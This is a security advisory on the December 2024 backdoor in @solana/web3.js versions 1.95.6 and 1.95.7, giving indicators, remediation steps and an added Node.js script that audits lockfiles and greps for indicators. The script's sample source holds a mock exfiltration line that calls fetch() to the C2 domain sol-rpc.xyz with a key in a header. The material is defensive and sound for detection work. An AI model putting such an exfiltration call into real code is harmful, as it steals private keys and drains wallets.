December 5, 2024
Severity
High
Analysis Summary
Cybersecurity researchers have reported a software supply chain attack against the widely used @solana/web3.js npm package. Two malicious versions were published that capture users' private keys, which the attackers can then use to drain the associated cryptocurrency wallets.
The compromised releases are versions 1.95.6 and 1.95.7; both have since been removed from the npm registry. The package is popular, with over 400,000 downloads every week. The malicious code inserted into these versions is designed to steal private keys from unsuspecting developers and users, potentially allowing the attackers to empty their wallets.
@solana/web3.js is the Solana JavaScript SDK, used by web applications and Node.js applications to interact with the Solana network. Security researchers say that the backdoor in version 1.95.7 adds a function called "addToQueue" that exfiltrates the private key using what appear to be legitimate Cloudflare headers. Calls to this function are then injected at other locations in the library that legitimately have access to the private key.
The keys are exfiltrated to a command-and-control (C2) server, sol-rpc[.]xyz, which is currently offline. The domain was registered with the registrar NameSilo on November 22, 2024. The npm package maintainers are believed to have been targeted by a phishing attack that gave the threat actors access to a publish account and enabled them to release the rogue versions.
@solana/web3.js is widely used by Solana dApps, and its publish-access account was compromised. This allowed the attacker to publish unauthorized, modified packages that steal private key material and drain funds from dApps that handle private keys directly, such as bots. Non-custodial wallets should not be affected, since they typically do not expose private keys during transactions.
The developers added that the incident primarily affects projects that were updated between 3:20 p.m. and 8:25 p.m. UTC on December 2, 2024 and that directly handle private keys. Users who depend on @solana/web3.js are advised to update to the latest version as soon as possible and to rotate any authority keys they believe may have been compromised.
Impact
- Sensitive Data Theft
- Cryptocurrency Theft
- Financial Loss
- Data Exfiltration
Indicators of Compromise
Domain Name
- sol-rpc.xyz
Malicious npm Package Versions
- @solana/web3.js 1.95.6
- @solana/web3.js 1.95.7
Remediation
- Users should update @solana/web3.js to the latest version (1.95.8 or later, which removes the malicious code) as soon as possible, and rotate any authority keys that may have been exposed while a compromised version was installed.
- Block all threat indicators at your respective controls.
- Search for indicators of compromise (IOCs) in your environment utilizing your respective security controls.
- Enable antivirus and anti-malware software and update signature definitions promptly. Multi-layered protection is necessary to secure vulnerable assets.
- Patch and upgrade platforms and software on time, and make this a standard security policy.
- Employ network intrusion detection and prevention systems to monitor and block malicious network activities.
- Implement network segmentation to limit lateral movement for attackers within the network.
- Implement advanced email filtering to detect and block phishing emails.
- Employ updated and robust endpoint protection solutions to detect and block malware.
- Develop and test an incident response plan to ensure a swift and effective response to security incidents.
- Enhance logging and monitoring capabilities to detect anomalous activities and unauthorized access.
- Conduct regular security audits and penetration testing to identify and address potential vulnerabilities.
- Regularly back up critical data and ensure that backup and recovery procedures are in place.
- Do not download documents attached in emails from unknown sources and strictly refrain from enabling macros when the source isn’t reliable.
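The following Node.js script is an added example written for this advisory; it is not code from the original page or from the Solana project. It shows how a practitioner would act on the compromised-version list from the Analysis Summary and on the "search for IOCs" remediation step: it walks a lockfileVersion 2/3 package-lock.json (the "packages" map) to find every installed copy of @solana/web3.js, including copies nested under other dependencies, flags the two malicious releases, and greps source text for the string indicators named above (the C2 domain and the injected function name). The lockfile, the dependency name "some-trading-lib" and the source snippet are constructed for the example; the snippet is not the real backdoor and its header name is illustrative only.

```javascript
// Added example (not from the advisory or the Solana project): audit an npm
// lockfile for the compromised @solana/web3.js releases and scan source text
// for the advisory's string indicators. All inputs below are constructed.

// Releases the advisory names as carrying the backdoor.
const COMPROMISED_VERSIONS = new Set(["1.95.6", "1.95.7"]);

// String indicators from the advisory: the C2 domain and the injected function.
const IOC_STRINGS = ["sol-rpc.xyz", "addToQueue"];

// Walk the "packages" map of a lockfileVersion 2/3 package-lock.json and return
// every install path of @solana/web3.js with a flag for compromised releases.
// Keys look like "node_modules/@solana/web3.js" or, for transitive copies,
// "node_modules/<dep>/node_modules/@solana/web3.js". (lockfileVersion 1 files
// use a nested "dependencies" tree instead and are not handled here.)
function auditLockfile(lock) {
  const hits = [];
  const packages = (lock && lock.packages) || {};
  for (const [installPath, meta] of Object.entries(packages)) {
    if (!installPath.endsWith("node_modules/@solana/web3.js")) continue;
    hits.push({
      path: installPath,
      version: meta.version,
      compromised: COMPROMISED_VERSIONS.has(meta.version),
    });
  }
  return hits;
}

// Search arbitrary text (contents of an installed or bundled JS file) for the
// string indicators. Returns the indicators that were found.
function scanForIocs(text) {
  return IOC_STRINGS.filter((ioc) => text.includes(ioc));
}

// Constructed sample lockfile: the root dependency is on a clean release, but a
// transitive copy under "some-trading-lib" (a made-up name) is pinned to 1.95.7.
const SAMPLE_LOCK = {
  name: "example-bot",
  lockfileVersion: 3,
  packages: {
    "": { name: "example-bot", version: "0.1.0" },
    "node_modules/@solana/web3.js": { version: "1.95.8" },
    "node_modules/some-trading-lib": { version: "2.0.0" },
    "node_modules/some-trading-lib/node_modules/@solana/web3.js": { version: "1.95.7" },
  },
};

// Constructed sample source: not the real backdoor, only a snippet that carries
// both indicators the way a grep over an installed package would see them.
// The header name is illustrative and not taken from the actual malware.
const SAMPLE_SOURCE = `
function addToQueue(k) {
  fetch("https://sol-rpc.xyz/api", { headers: { "CF-Connecting-IP": k } });
}
`;

for (const h of auditLockfile(SAMPLE_LOCK)) {
  console.log(`${h.compromised ? "COMPROMISED" : "ok"}  ${h.path}@${h.version}`);
}
console.log("IOC strings found:", scanForIocs(SAMPLE_SOURCE));
```

To run this against a real project, load package-lock.json with fs.readFileSync and JSON.parse it before calling auditLockfile, and run scanForIocs over node_modules/@solana/web3.js/lib as well as any built bundles, since bundlers inline the library and a clean lockfile does not clear an artifact built while 1.95.6 or 1.95.7 was installed. Projects using yarn or pnpm lockfiles need the equivalent walk over those formats.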